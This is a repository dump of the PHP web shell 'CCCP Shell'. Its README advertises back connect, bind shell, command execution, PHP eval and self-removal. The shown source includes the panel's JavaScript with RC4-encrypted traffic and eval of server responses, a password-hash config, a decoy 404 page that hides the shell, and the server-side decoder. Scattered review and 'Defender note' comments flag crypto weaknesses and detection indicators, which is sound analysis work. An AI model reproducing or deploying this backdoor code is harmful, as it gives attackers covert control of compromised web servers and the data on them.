├── CCCP-Shell.php
├── README.md
├── builder
├── base
│ ├── base.css
│ ├── base.js
│ ├── config.php
│ ├── fakeindex.php
│ ├── helpers.php
│ ├── loader.js
│ ├── loader.php
│ ├── theme.php
│ └── zip.php
├── builder.php
├── includes
│ ├── jsPacker.php
│ └── tools.php
└── sections
│ ├── connect.php
│ ├── execute.php
│ ├── filemanager.css
│ ├── filemanager.php
│ ├── info.php
│ ├── process.php
│ ├── selfremove.php
│ ├── sql.js
│ └── sql.php
├── examples
├── mysql_exploit_example.php
├── serv-u_exploit_example.php
└── windows_registry.php
└── misc
├── 687474703a2f2f6935392e74696e797069632e636f6d2f32696b776d6d612e6a7067.jpg
├── 687474703a2f2f6935392e74696e797069632e636f6d2f6663327a32762e6a7067.jpg
├── 687474703a2f2f6936302e74696e797069632e636f6d2f726c7a316f6c2e6a7067.jpg
├── 687474703a2f2f6936322e74696e797069632e636f6d2f327a35353363382e6a7067.jpg
├── diagram.png
└── diagram.psd
/README.md:
--------------------------------------------------------------------------------
1 | CCCP Shell
2 | ====
3 |
4 | CCCPShell is a PHP Shell written from scratch in my spare time.
5 |
6 | 
7 |
8 | You will find in this shell
9 | -----------
10 | * Pure javascript (sessionStorage, serialize, ajax, append, remove, empty, change sort table order and dialogs modals)
11 | * PHP zip with php code
12 | * Full DB explorer (mysql, mssql, pgsql, oracle, sqlite, sqlite3, odbc and pdo)
13 | * 21 icons for use in 94 file types
14 | * CSS3
15 | * Easy to translate to another language via tText function *WIP*
16 | * All the standard shell stuff
17 | * Encrypted communication (first phpshell in the world???)
18 | * Supports PHP > 4.3 (latest versions not tested on PHP 4)
19 |
20 | All tools
21 | -----------
22 | - Filemanager
23 | - Copy/paste (recursive)
24 | - In memory compress and download (recursive)
25 | - Uncompress files
26 | - Upload files to server
27 | - Delete (recursive)
28 | - Create file/folder
29 | - Fast view folder size/count objects
30 | - Fast file rename
31 | - Fast chmod
32 | - Fast change filedate
33 | - Create file/folder
34 | - View file information
35 | - Full Path
36 | - Size
37 | - MD5
38 | - Chmod/Chown
39 | - Create time
40 | - Access time
41 | - Modify time
42 | - Hexdump preview/full
43 | - Highlight code
44 | - File Content
45 | - Edit
46 | - Change filetime
47 | - File Name
48 | - Change content
49 | - Procs
50 | - Process viewer/info
51 | - Process killer
52 | - SQL
53 | - Database explorer
54 | - Execute SQL code
55 | - Info
56 | - Server info
57 | - PHP Info
58 | - Custom functions check
59 | - External Connect
60 | - Back Connect
61 | - Bind Shell
62 | - Execute
63 | - Eval PHP code
64 | - Execute (exec, shell_exec, system, passthru, popen and proc_open)
65 | - Self remove
66 |
67 | WARNING
68 | -----------
69 | This shell uses the atob and btoa JavaScript functions. Check whether your browser supports them: https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64.atob
70 |
71 | Images
72 | -----------
73 |
74 | 
75 |
76 | 
77 |
78 | 
79 |
--------------------------------------------------------------------------------
/builder/base/base.css:
--------------------------------------------------------------------------------
1 | *{
2 | box-sizing: border-box;
3 | color: #fff;
4 | font-family: verdana;
5 | text-decoration: none;
6 | }
7 | body{
8 | background-color: #000;
9 | }
10 | body, td, th{
11 | color: #d9d9d9;
12 | font-size: 11px;
13 | }
14 | td{
15 | font-size: 8pt;
16 | color: #ebebeb;
17 | }
18 | td.header{
19 | font-weight: normal;
20 | font-size: 10pt;
21 | background: #7d7474;
22 | }
23 | a{
24 | font-weight: normal;
25 | color: #dadada;
26 | }
27 | a.links{
28 | text-decoration: none;
29 | }
30 | a:hover{
31 | text-decoration: underline;
32 | }
33 | input, textarea, button, select, option{
34 | background-color: #800;
35 | border: 0;
36 | font-size: 8pt;
37 | font-family: Tahoma;
38 | margin: 5px;
39 | padding: 6px;
40 | }
41 | select, option{
42 | padding: 3px;
43 | }
/* Paragraphs: no vertical margins. */
44 | p{
45 | margin-top: 0px;
46 | margin-bottom: 0px;
47 | size-height: 150% /* NOTE(review): `size-height` is not a CSS property, so browsers drop this declaration; `line-height` may have been intended — confirm */
48 | }
49 | table.sortable tbody tr:hover td{
50 | background-color: #8080FF;
51 | }
52 | table.sortable tbody tr:nth-child(2n), .alt1{
53 | background-color: #7d7474;
54 | }
55 | table.sortable tbody tr:nth-child(2n+1), .alt2{
56 | background-color: #7d7f74;
57 | }
58 | pre{
59 | font: 9pt Courier, Monospace;
60 | }
61 | .bigarea{
62 | height: 220px;
63 | width: 100%;
64 | }
65 | .ml1{
66 | border:1px solid #444;
67 | padding:5px;
68 | margin:0;
69 | overflow: auto;
70 | }
71 | .notif{
72 | border-radius: 6px 6px 6px 6px;
73 | font-weight: 700;
74 | margin: 3px 0;
75 | padding: 4px 8px 4px;
76 | }
77 | .uiinfo{
78 | display: none;
79 | border: 1px solid #800000;
80 | border-radius: 6px 6px 6px 6px;
81 | margin: 4px 0;
82 | width: 100%;
83 | }
84 | .explore{
85 | width:100%;
86 | border-collapse:collapse;
87 | border-spacing:0;
88 | }
89 | .explore a{
90 | text-decoration:none;
91 | }
92 | .explore td{
93 | padding:5px 10px 5px 5px;
94 | }
95 | .explore th{
96 | font-weight:700;
97 | background-color:#222;
98 | }
99 | .explore tbody tr:hover, .mark{
100 | background-color:#8080FF;
101 | }
102 | .box{
103 | min-width:50%;
104 | border:1px solid #fff;
105 | padding:8px 8px 0 8px;
106 | position:fixed;
107 | background:#000;
108 | box-shadow:1px 1px 25px #150f0f;
109 | opacity:0.96;
110 | }
111 | .boxtitle{
112 | background:#7d7474;
113 | font-weight:bold;
114 | text-align:center;
115 | cursor: move;
116 | padding: 3px;
117 | }
118 | .boxtitle a, .boxtitle a:hover{
119 | color:#aaa;
120 | }
121 | .boxcontent{
122 | padding:2px 0 2px 0;
123 | }
124 | .boxresult{
125 | padding:4px 10px 6px 10px;
126 | border-top:1px solid #222;
127 | margin-top:4px;
128 | text-align:center;
129 | }
130 | .boxtbl{
131 | border:1px solid #222;
132 | border-radius:8px;
133 | padding-bottom:8px;
134 | }
135 | .boxtbl td{
136 | vertical-align:middle;
137 | padding:8px 15px;
138 | border-bottom:1px dashed #222;
139 | }
140 | .boxtbl input, .boxtbl select, .boxtbl textarea, .boxtbl, .button{
141 | width:100%;
142 | }
143 | .boxlabel{
144 | text-align: center;
145 | border-bottom:1px solid #222;
146 | padding-bottom:8px;
147 | }
148 | .boxclose{
149 | background:#222;
150 | padding:2px;
151 | margin-right:2px;
152 | padding:0 4px;
153 | cursor:pointer;
154 | }
155 | .button{
156 | min-width:120px;
157 | color:#fff;
158 | background:#800;
159 | border:none;
160 | display:block;
161 | text-align:center;
162 | /*float:left;*/
163 | padding: 6px;
164 | cursor:pointer;
165 | }
166 | .button:hover, #ulDragNDrop:hover{
167 | background:#820;
168 | }
169 | .floatLeft{
170 | text-align:left;
171 | float:left;
172 | }
173 | .floatRight{
174 | float:right;
175 | }
176 | .floatCenter{
177 | text-align:center;
178 | margin-left:auto;
179 | margin-right:auto;
180 | }
181 | .colFit{
182 | width:1px;
183 | white-space:nowrap;
184 | }
185 | .colSpan{
186 | width:100%;
187 | }
188 | .loading {
189 | margin-left: auto;
190 | margin-right: auto;
191 | background-color: rgba(0,0,0,0);
192 | border: 5px solid #800;
193 | opacity: .9;
194 | border-top: 5px solid rgba(0,0,0,0);
195 | border-left: 5px solid rgba(0,0,0,0);
196 | border-radius: 50px;
197 | box-shadow: 0 0 35px #800;
198 | width: 50px;
199 | height: 50px;
200 | margin: 0 auto;
201 | -moz-animation: spin .5s infinite linear;
202 | -webkit-animation: spin .5s infinite linear;
203 | }
/* Small variant of the spinner: thinner border and a 15px box. */
204 | .mini {
205 | border: 2px solid #800;
206 | border-top: 2px solid rgba(0,0,0,0);
207 | border-left: 2px solid rgba(0,0,0,0);
208 | border-radius: 10px;
209 | box-shadow: 0; /* NOTE(review): a single length is not a valid box-shadow value, so this declaration is ignored; `none` may have been intended — confirm */
210 | width: 15px;
211 | height: 15px;
212 | }
213 | @-moz-keyframes spin {
214 | 0% {-moz-transform: rotate(0deg);}
215 | 100% {-moz-transform: rotate(360deg);};
216 | }
217 | @-moz-keyframes spinoff {
218 | 0% {-moz-transform: rotate(0deg);}
219 | 100% {-moz-transform: rotate(-360deg);};
220 | }
221 | @-webkit-keyframes spin {
222 | 0% {-webkit-transform: rotate(0deg);}
223 | 100% {-webkit-transform: rotate(360deg);};
224 | }
225 | @-webkit-keyframes spinoff {
226 | 0% {-webkit-transform: rotate(0deg);}
227 | 100% {-webkit-transform: rotate(-360deg);};
228 | }
229 |
230 | .hide{
231 | display:none;
232 | margin:0;
233 | padding:0;
234 | }
235 |
236 | .touch{cursor:pointer;}
237 | .my{color:yellow;}
238 | .mg{color:green;}
239 | .mr{color:red;}
240 | .mw{color:white;}
241 | .table{display:table;}
242 | .table-caption{display:table-caption;}
243 | .table-row{display:table-row;}
244 | .table-col{display:table-cell; padding: 5px;}
245 |
246 | .stdui{
247 | padding:6px;
248 | }
249 |
250 | .uires{
251 | border: 1px solid #ddd;
252 | padding: 15px;
253 | margin: 10px;
254 | text-align: center;
255 | font-weight: bold;
256 | }
257 |
258 | .image{
259 | width:16px;
260 | height:16px;
261 | cursor:pointer;
262 | display:block;
263 | float:left;
264 | margin-right:3px;
265 | }
266 |
267 | div.paginator {
268 | text-align:center;
269 | padding: 7px;
270 | margin: 3px;
271 | }
272 |
273 | div.paginator a {
274 | padding: 2px 5px 2px 5px;
275 | margin: 2px;
276 | border: 1px solid #000;
277 | text-decoration: none;
278 | }
279 |
280 | div.paginator a:hover, div.paginator a:active {
281 | border: 1px solid #000;
282 | background-color:#000;
283 | color: #fff;
284 | }
285 |
286 | div.paginator span.current {
287 | padding: 2px 5px 2px 5px;
288 | margin: 2px;
289 | border: 1px solid #000;
290 | font-weight: bold;
291 | background-color: #000;
292 | color: #fff;
293 | }
294 |
295 | div.paginator span.disabled {
296 | padding: 2px 5px 2px 5px;
297 | margin: 2px;
298 | border: 1px solid #eee;
299 | color: #ddd;
300 | }
--------------------------------------------------------------------------------
/builder/base/base.js:
--------------------------------------------------------------------------------
// Page-level state shared by every function in this file.
1 | var h = 0; // NOTE(review): h and j look like false/true stand-ins for the minified sorttable code below — confirm
2 | var j = 1;
3 | var d = document; // short alias used by the DOM helpers in this file
4 | var euc = encodeURIComponent; // short alias used when building query strings
5 | var onDrag = false; // true while the dialog box is following the mouse (see drag_loop)
6 | var dragX, dragY, dragDeltaX, dragDeltaY, lastAjax , lastLoad = ""; // only lastLoad is initialised here
7 | var copyBuffer = [];
8 |
9 | // sorttable js
10 | sorttable={k:function(a){sorttable.a=/^(\d\d?)[\/\.-](\d\d?)[\/\.-]((\d\d)?\d\d)$/,0==a.getElementsByTagName("thead").length&&(the=d.createElement("thead"),the.appendChild(a.rows[0]),a.insertBefore(the,a.firstChild));null==a.tHead&&(a.tHead=a.getElementsByTagName("thead")[0]);
11 | if(1==a.tHead.rows.length){sortbottomrows=[];for(b=0;bc;--f)0>b(a[f],a[f-1])&&(g=a[f],a[f]=a[f-1],a[f-1]=g,g=h);c++}}};
21 | n=1;function p(a){b=h;a||(a=((this.ownerDocument||this.document||this).parentWindow||window).event,a.preventDefault=q,a.stopPropagation=r);c=this.b[a.type],e;for(e in c)this.h=c[e],this.h(a)===j&&(b=j);return b}function q(){this.returnValue=j}function r(){this.cancelBubble=h}Array.forEach||(Array.forEach=function(a,b,c){for(e=0;e= 0; i = i - 1){
50 | if (form.elements[i].name === "") continue;
51 | switch (form.elements[i].nodeName){
52 | case "INPUT":
53 | switch (form.elements[i].type){
54 | case "text":
55 | case "hidden":
56 | case "password":
57 | case "button":
58 | case "reset":
59 | case "submit":
60 | q.push(form.elements[i].name + "=" + euc(form.elements[i].value));
61 | break;
62 | case "checkbox":
63 | case "radio":
64 | if (form.elements[i].checked) q.push(form.elements[i].name + "=" + euc(form.elements[i].value));
65 | break;
66 | case "file":
67 | break;
68 | }
69 | break;
70 | case "TEXTAREA":
71 | q.push(form.elements[i].name + "=" + euc(form.elements[i].value));
72 | break;
73 | case "SELECT":
74 | switch (form.elements[i].type){
75 | case "select-one":
76 | q.push(form.elements[i].name + "=" + euc(form.elements[i].value));
77 | break;
78 | case "select-multiple":
79 | for (j = form.elements[i].options.length - 1; j >= 0; j = j - 1){
80 | if (form.elements[i].options[j].selected) q.push(form.elements[i].name + "=" + euc(form.elements[i].options[j].value));
81 | }
82 | break;
83 | }
84 | break;
85 | case "BUTTON":
86 | switch (form.elements[i].type){
87 | case "reset":
88 | case "submit":
89 | case "button":
90 | q.push(form.elements[i].name + "=" + euc(form.elements[i].value));
91 | break;
92 | }
93 | break;
94 | }
95 | }
96 | return q.join("&");
97 | }
98 |
// Client-side codec for request and response bodies.
//   m === "e": prepend the output of randStr(config.rc4drop) to s, RC4 it with a
//              state built from `hash`, then base64-encode and URI-encode it.
//   otherwise: base64-decode s, RC4 it with the same state and drop the first
//              config.rc4drop characters.
// `hash`, `config`, `randStr`, `rc4Init` and `rc4` are defined outside this block.
// NOTE(review): the PHP side keys RC4 with $config['sPass'], so `hash` is presumably
// that same MD5 value — confirm.
// Defender note: the state is rebuilt from the same key on every call and there is
// no nonce or MAC, so every message reuses the same keystream. Captured bodies can
// be decoded with the key material and are open to known-plaintext recovery.
99 | function getData(s, m){
100 | k = rc4Init(hash); // `k` and `r` are assigned without declaration, i.e. as globals
101 | try {
102 | if (m === "e") {
103 | //console.log(s);
104 | r = euc(btoa(rc4(randStr(config.rc4drop) + s, k)));
105 | } else
106 | r = rc4(atob(s), k).substr(config.rc4drop);
107 | } catch(err) {
108 | r = d; // any exception (e.g. atob on malformed input) yields the page-level `d` (document), not a string
109 | }
110 |
111 | return r;
112 | }
113 |
// Sends one request to the server-side script and hands the decoded reply to cf.
//   p  - plaintext query string (callers in this file build e.g. "me=filemanager&dir=...")
//   cf - callback invoked with getData(responseText, "d") once readyState reaches 4
// Returns the bookkeeping object `ao` (callback, XMLHttpRequest, bound handlers).
// On the wire every request is an asynchronous POST to `targeturl` (defined outside
// this block) whose body is a single form field, named by config.consNames.post,
// carrying the output of getData(p, "e").
// Defender note: every panel action therefore has the same shape — POST,
// X-Requested-With: XMLHttpRequest, one field holding URL-encoded base64. Seeing it
// requires request-body logging or inspection; URL-only access logs show nothing
// but repeated POSTs to one script.
114 | function ajax(p, cf){
115 | console.log(p); // the plaintext request is also written to the browser console
116 | var ao = {};
117 | lastAjax = p;
118 | ao.cf = cf;
119 | ao.request = new XMLHttpRequest();
120 | ao.bindFunction = function (caller, object){
121 | return function (){
122 | return caller.apply(object, [object]);
123 | };
124 | };
125 | ao.stateChange = function (object){
126 | if (ao.request.readyState == 4) ao.cf(getData(ao.request.responseText, "d")); // HTTP status is not checked
127 | };
128 | if (window.XMLHttpRequest){
129 | req = ao.request;
130 | req.onreadystatechange = ao.bindFunction(ao.stateChange, ao);
131 | req.open("POST", targeturl, true);
132 | req.setRequestHeader("X-Requested-With", "XMLHttpRequest");
133 | req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
134 | req.setRequestHeader("Connection", "close"); // "Connection" is a forbidden header name for XMLHttpRequest, so browsers ignore this call
135 | req.send(config.consNames.post + "=" + getData(p, "e"));
136 | }
137 | return ao;
138 | }
139 |
// Reads the data-path attribute from the element two levels above e.
// When t is truthy the value of the #base input is prefixed to it.
function dpath(e, t){
    var row = e.parentNode.parentNode;
    return t
        ? d.getElementById("base").value + row.getAttribute("data-path")
        : row.getAttribute("data-path");
}
146 |
147 | //TODO removeEventListener
148 | function drag_start(){
149 | if(!onDrag){
150 | onDrag = true;
151 | //d.removeEventListener("mousemove", function(e){}, false);
152 | d.addEventListener("mousemove", function(e){
153 | dragX = e.pageX;
154 | dragY = e.pageY;
155 | }, false);
156 | setTimeout("drag_loop()", 50);
157 | }
158 | }
159 |
160 | function drag_loop(){
161 | if (onDrag){
162 | x = dragX - dragDeltaX;
163 | y = dragY - dragDeltaY;
164 | if (x < 0) x = 0;
165 | if (y < 0) y = 0;
166 | o = d.getElementById("box").style;
167 | o.left = x + "px";
168 | o.top = y + "px";
169 | setTimeout("drag_loop()", 50);
170 | }
171 | }
172 |
173 | function drag_stop(){
174 | onDrag = false;
175 | //d.removeEventListener("mousemove", function(e){}, false);
176 | }
177 |
178 | function show_box(t, ct){
179 | hide_box();
180 | box = "" +
181 | t + "x
" +
182 | ct + "
";
183 | append("content", box);
184 |
185 | x = (d.body.clientWidth - d.getElementById("box").clientWidth)/2;
186 | y = (d.body.clientHeight - d.getElementById("box").clientHeight)/2;
187 | if (x < 0) x = 0;
188 | if (y < 0) y = 0;
189 | dragX = x;
190 | dragY = y;
191 | o = d.getElementById("box").style;
192 | o.left = x + "px";
193 | o.top = y + "px";
194 |
195 | d.addEventListener("keyup", function (e){
196 | if (e.keyCode === 27) hide_box();
197 | });
198 |
199 | d.getElementById("boxtitle").addEventListener("click", function(e){
200 | e.preventDefault();
201 | if (!onDrag){
202 | dragDeltaX = e.pageX - parseInt(o.left);
203 | dragDeltaY = e.pageY - parseInt(o.top);
204 | drag_start();
205 | } else
206 | drag_stop();
207 | }, false);
208 |
209 | if (d.getElementById("uival")) d.getElementById("uival").focus();
210 | }
211 |
212 | function hide_box(){
213 | onDrag = false;
214 | //d.removeEventListener("keyup", function(e){}, false);
215 | remove("box");
216 | remove("dlf");
217 | }
218 |
219 | function ajaxLoad(p){
220 | empty("content");
221 | append("content", "");
222 | ajax(p, function(r){
223 | empty("content");
224 | append("content", r);
225 | uiUpdateControls();
226 | lastLoad = p;
227 | });
228 | }
229 |
// Post-processing hook run after new content has been placed in the page
// (ajaxLoad calls it once the response has been appended to #content).
// It looks up three optional elements by id and acts on each one that exists.
230 | function uiUpdateControls(){
231 | o = d.getElementById("jseval");
232 | if (o) eval(o.value); // SECURITY: evaluates whatever the decoded response put in #jseval; the channel has no integrity check, so altered response bytes that still decode can end up as script here
233 | o = d.getElementById("sort");
234 | if (o) sorttable.k(o); // make the #sort table sortable
235 | o = d.getElementById("etime");
236 | if (o) d.getElementById("uetime").innerHTML = o.value; // copy #etime's value into #uetime as HTML
237 | }
238 |
239 | function viewSize(f){
240 | f.innerHTML = "";
241 | ajax("me=filemanager&md=vs&f=" + euc(dpath(f, true)), function(r){
242 | f.innerHTML = r;
243 | });
244 | }
245 |
246 | function godir(f, t){
247 | ajaxLoad("me=filemanager&dir=" + euc(dpath(f, t)));
248 | }
249 |
250 | function godisk(f){
251 | ajaxLoad("me=filemanager&dir=" + euc(f.getAttribute("data-path")));
252 | }
253 |
254 | function godirui(){
255 | ajaxLoad("me=filemanager&dir=" + euc(d.getElementById("goui").value));
256 | }
257 |
258 | function showUI(a, o){
259 | path = dpath(o, false);
260 | datapath = dpath(o, true);
261 | disabled = "";
262 | text = "Name";
263 | btitle = "Go!";
264 |
265 | if (a === "del"){
266 | disabled = "disabled";
267 | title = "Del";
268 | } else if (a === "ren"){
269 | title = "Rename";
270 | } else if (a === "mpers"){
271 | path = o.innerHTML.substring(17, 21);
272 | title = "Chmod/Chown";
273 | text = title.substring(0, 5);
274 | } else if (a === "mdate"){
275 | path = o.getAttribute("data-ft");
276 | title = "Date";
277 | text = title;
278 | } else if ((a === "cdir") || (a === "cfile")){
279 | path = "";
280 | datapath = d.getElementById("base").value;
281 | title = "Create directory";
282 | if (a === "cfile") title = "Create file";
283 | }
284 |
285 | ct = "";
289 | show_box(title, ct);
290 | }
291 |
292 | function showUISec(a){
293 | btitle = "Go!";
294 | uival = "";
295 | n = """";
296 | s = serialize(d.forms[0]).replace(/chkall=&/g, "");
297 | s = s.substring(0, s.indexOf("&goui="));
298 |
299 | if (a === "comp"){
300 | title = "Download";
301 | } else if (a === "uncomp"){
302 | title = "Uncompress";
303 | } else if (a === "copy"){
304 | title = "Copy";
305 | uival = "To | |
";
306 | n = "d.getElementById("uival").value";
307 | } else if (a === "rdel"){
308 | title = "Del";
309 | }
310 |
311 | ct = "" +
312 | uival +
313 | " |
" +
314 | "" + btitle + " |
" +
315 | "
";
316 | show_box(title, ct);
317 | }
318 |
319 | function showFMExtras(){
320 | ct = "";
332 |
333 | show_box("Show extra tools", ct);
334 | }
335 |
336 | function processUI(a, o, n){
337 | if ((a === "del" || a === "rdel") && config.checkBDel) {
338 | if (!confirm('Are you sure?')) {
339 | hide_box();
340 | return;
341 | }
342 | }
343 |
344 | if (a === "comp"){
345 | hide_box();
346 | append("content", "");
347 | } else {
348 | if (a === "uncomp") o = "dummy" + o;
349 | else if (a !== "rdel" && n === "") return;
350 | else if (a !== "copy" && a !== "rdel") o = euc(o);
351 | else if (a === "ren") n = d.getElementById("base").value + n;
352 |
353 | append("box", "");
354 | ajax("me=filemanager&md=tools&ac=" + a + "&a=" + o + "&b=" + euc(n), function(r){
355 | remove("mloading");
356 | if (r === "OK"){
357 | hide_box();
358 | ajaxLoad(lastLoad);
359 | } else
360 | append("box", "" + r + "
");
361 | });
362 | }
363 | }
364 |
365 | function dl(o){
366 | remove("dlf");
367 | append("content", "");
368 | }
369 |
370 | function up(){
371 | ct = "";
379 | show_box("Upload", ct);
380 | }
381 |
382 | function upaction(){
383 | uri = d.getElementById("uri").value;
384 | if (uri !== "")
385 | processUI("reup", d.getElementById("base").value, uri);
386 | else if (d.getElementById("upf").value !== "")
387 | document.up.submit();
388 | }
389 |
390 | function uiupdate(t){
391 | ajax(serialize(d.forms[t]), function(r){
392 | if (!d.getElementById("uires"))
393 | prepend("content", "");
394 |
395 | append("uires", "Shell response: " + r + "
\n");
396 | d.getElementById("uires").scrollIntoView();
397 | });
398 | }
399 |
400 |
401 | function CheckAll(form){
402 | for(i = 0; i < form.elements.length; i++){
403 | e = form.elements[i];
404 | if (e.name != "chkall") e.checked = form.chkall.checked;
405 | }
406 | }
407 |
408 | function toggle(b){
409 | if (d.getElementById(b)){
410 | if (d.getElementById(b).style.display == "block") d.getElementById(b).style.display = "none";
411 | else d.getElementById(b).style.display = "block"
412 | }
413 | }
414 |
415 | function change(l, b){
416 | d.getElementById(l).style.display = "none";
417 | d.getElementById(b).style.display = "block";
418 | if (d.getElementById("goui")) d.getElementById("goui").focus();
419 | }
420 |
421 | function hilite(e){
422 | c = e.parentElement.parentElement;
423 | if (e.checked)
424 | c.className = "mark";
425 | else
426 | c.className = "";
427 |
428 | a = d.getElementsByName("cbox");
429 | b = d.getElementById("total_selected");
430 | c = 0;
431 |
432 | for (i = 0;i'dsr', 'slogin'=>'cccpshell', 'sqlclog'=>'conlog'); //Constants names
// $config['sPass'] is the MD5 hex digest of the panel password. helpers.php passes
// this digest itself (not the password) to rc4encrypt()/rc4decrypt() as the key.
// Defender note: a copy of the deployed file recovered during incident response is
// therefore enough to decrypt captured request and response bodies. The unsalted
// digest below is a static value and can serve as a content indicator for builds
// left on the default configuration.
12 | $config['sPass'] = '775a373fb43d8101818d45c28036df87'; // md5(pass)
// Number of random characters rc4encrypt() prepends and rc4decrypt() strips again.
13 | $config['rc4drop'] = 123; //drop size
14 |
--------------------------------------------------------------------------------
/builder/base/fakeindex.php:
--------------------------------------------------------------------------------
1 |
2 |
3 | 404 Not Found
4 |
49 |
50 | Not Found
51 | The requested URL was not found on this server.
52 |
53 |
54 |
55 |
--------------------------------------------------------------------------------
/builder/base/helpers.php:
--------------------------------------------------------------------------------
1 | ";
34 | }
35 |
36 | function mLink($t, $o, $e = '', $m = true){
37 | if ($m) $o .= ';return false;';
38 | return "$t";
39 | }
40 |
41 | function mInput($n, $v, $tt = '', $nl = '', $c = '', $e = ''){
42 | if ($tt !== '') $tt = "$tt
";
43 |
44 | $input = "$tt";
45 | if ($nl !== '') $input = "$input
";
46 |
47 | return $input;
48 | }
49 |
50 | function mSubmit($v, $o, $nl = '', $e = ''){
51 | $input = "";
52 | if ($nl !== '') $input = "$input
";
53 |
54 | return $input;
55 | }
56 |
57 | function mSelect($n, $v, $nk = false, $s = false, $o = false, $t = false, $nl = false, $e = false){
58 | $tmp = '';
59 | if ($o) $o = "onchange='$o'";
60 | if ($t) $t = "$t
";
61 | foreach ($v as $key => $value){
62 | if ($nk) $key = $value;
63 | $tmp .= "";
64 | }
65 |
66 | $tmp = "$t";
67 | if ($nl)
68 | $tmp = "$tmp
";
69 |
70 | return $tmp;
71 | }
72 |
73 | function mCheck($n, $v, $o = '', $c = false){
74 | return "";
75 | }
76 |
77 | function genPaginator($c, $t = -1, $fm = true) {
78 | global $p;
79 |
80 | $l = 'dbexec(euc("' . (isset($p['code']) ? $p['code'] : '') . '") + "&pg=';
81 | if ($fm)
82 | $l = 'ajaxLoad("me=file&dir=" + euc(d.getElementById("base").value) + "&pg=';
83 |
84 | if ($t < 0)
85 | $t = $c + 1;
86 |
87 | $tmp = '';
88 | $i = 0;
89 | while($i < $t) {
90 | $i++;
91 | if ($i < $c)
92 | $tmp .= mLink($i, $l . $i . '")', 'class="prev"');
93 | else if ($i == $c)
94 | $tmp .= '' . $i . '';
95 | else
96 | $tmp .= mLink($i . ($fm ? ' ...?' : ''), $l . $i . '")', 'class="next"');
97 | }
98 |
99 | return $tmp . '
';
100 | }
101 |
102 |
/**
 * Undo magic_quotes_gpc escaping on a request value (string or nested array).
 * The input is returned untouched when get_magic_quotes_gpc() does not exist
 * or reports that magic quotes are off.
 */
function fix_magic_quote($arr){
    $sybase = strtolower(ini_get('magic_quotes_sybase'));
    $sybase = !(empty($sybase) || $sybase === 'off');

    if (!function_exists('get_magic_quotes_gpc') || !get_magic_quotes_gpc()) {
        return $arr;
    }

    if (!is_array($arr)) {
        return stripslashes($arr);
    }

    foreach ($arr as $k => $v) {
        if (is_array($v)) {
            $arr[$k] = fix_magic_quote($v);   // recurse into nested arrays
        } elseif ($sybase) {
            $arr[$k] = stripslashes($v);
        } else {
            $arr[$k] = stripslashes(str_replace("\'\'", "\'", $v));
        }
    }

    return $arr;
}
118 |
/**
 * RC4 key schedule: builds the 256-entry permutation for the key string $pwd.
 * The key bytes are repeated cyclically to cover all 256 positions.
 * Returns the permutation as an array indexed 0..255.
 */
function rc4Init($pwd) {
    $len = strlen($pwd);
    $state = range(0, 255);
    $mix = 0;

    $pos = 0;
    while ($pos < 256) {
        $mix = ($mix + $state[$pos] + ord($pwd[$pos % $len])) % 256;
        // swap entries $pos and $mix
        $held = $state[$pos];
        $state[$pos] = $state[$mix];
        $state[$mix] = $held;
        $pos++;
    }

    return $state;
}
138 |
/**
 * RC4 keystream generation and XOR. Because RC4 is symmetric the same call
 * both encrypts and decrypts.
 * $data is the byte string to transform, $box a 256-entry permutation such as
 * the one rc4Init() returns. Returns the transformed byte string.
 */
function rc4($data, $box) {
    $out = '';
    $total = strlen($data);
    $x = 0;
    $y = 0;

    $pos = 0;
    while ($pos < $total) {
        $x = ($x + 1) % 256;
        $y = ($y + $box[$x]) % 256;

        // swap entries $x and $y
        $held = $box[$x];
        $box[$x] = $box[$y];
        $box[$y] = $held;

        $ks = $box[($box[$x] + $box[$y]) % 256];
        $out .= chr(ord($data[$pos]) ^ $ks);
        $pos++;
    }

    return $out;
}
155 |
// Prefixes $data with $config['rc4drop'] random characters and RC4-encrypts the
// result. Despite its name, $box is the key string: it is handed to rc4Init() here.
// Defender note: mt_rand() is not a cryptographic generator and the prefix is not a
// nonce. The RC4 state is rebuilt from the same key on every call, so the payload
// bytes of every message are XORed with the same keystream segment and carry no
// integrity tag. Captured traffic is open to known-plaintext recovery.
156 | function rc4encrypt($data, $box) {
157 | global $config;
158 | for ($i = 1; $i <= $config['rc4drop']; $i++)
159 | $data = chr(mt_rand(33, 122)) . $data; // one random character with code 33..122 per iteration
160 | return rc4($data, rc4Init($box));
161 | }
162 |
// Inverse of rc4encrypt(): RC4-decrypts $data with the key string $box and drops
// the first $config['rc4drop'] bytes (the random prefix).
// Nothing here verifies that the result is a genuine message; a wrong key simply
// yields different bytes.
163 | function rc4decrypt($data, $box) {
164 | global $config;
165 | return substr(rc4($data, rc4Init($box)), $config['rc4drop']);
166 | }
167 |
// Server-side request decoder. Returns the decoded parameters as an array, or ''
// when the carrier field is absent or empty.
// The carrier field is named by $config['consNames']['post'] and is read from POST
// first, then from GET. Its value is base64-decoded, decrypted with rc4decrypt()
// under $config['sPass'], and parsed as an '&'/'=' separated query string with
// rawurldecode() applied to each value. Names containing "[]" are collected into arrays.
// Defender notes: because of the GET fallback the same payload can also arrive in a
// URL query string, where ordinary access logs record it. The field name comes from
// configuration, so it is not a stable signature across builds.
168 | function getData(){
169 | global $config;
170 | $p = '';
171 | if (isset($_POST[$config['consNames']['post']])) $p = fix_magic_quote($_POST[$config['consNames']['post']]);
172 | else if (isset($_GET[$config['consNames']['post']])) $p = fix_magic_quote($_GET[$config['consNames']['post']]);
173 | if (!empty($p)){
174 | $data = array();
175 | $p = rc4decrypt(base64_decode($p), $config['sPass']); // the stored MD5 digest is the RC4 key
176 | foreach(explode('&', $p) as $tmp) {
177 | $tmp = explode('=', $tmp);
178 | if (!empty($tmp[0])){
179 | if (strpos($tmp[0], '[]') !== false) $data[str_replace('[]', '', $tmp[0])][] = rawurldecode($tmp[1]);
180 | else $data[$tmp[0]] = rawurldecode($tmp[1]); // NOTE(review): $tmp[1] is read without checking that the pair contained '='
181 | }
182 | }
183 | $p = $data;
184 | }
185 | return $p;
186 | }
187 |
188 | function getSelf(){
189 | return $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
190 | }
191 |
/**
 * Translation lookup placeholder.
 * Without a default the id is returned as-is; otherwise $lang[$id] is returned
 * when set, else the default. $lang is not brought into scope in this function.
 */
function tText($id, $def = false){
    // TODO: decide what to do with this function

    if ($def === false) return $id;

    return isset($lang[$id]) ? $lang[$id] : $def;
}
202 |
203 | function showIcon($f){
204 | $image = 'unk';
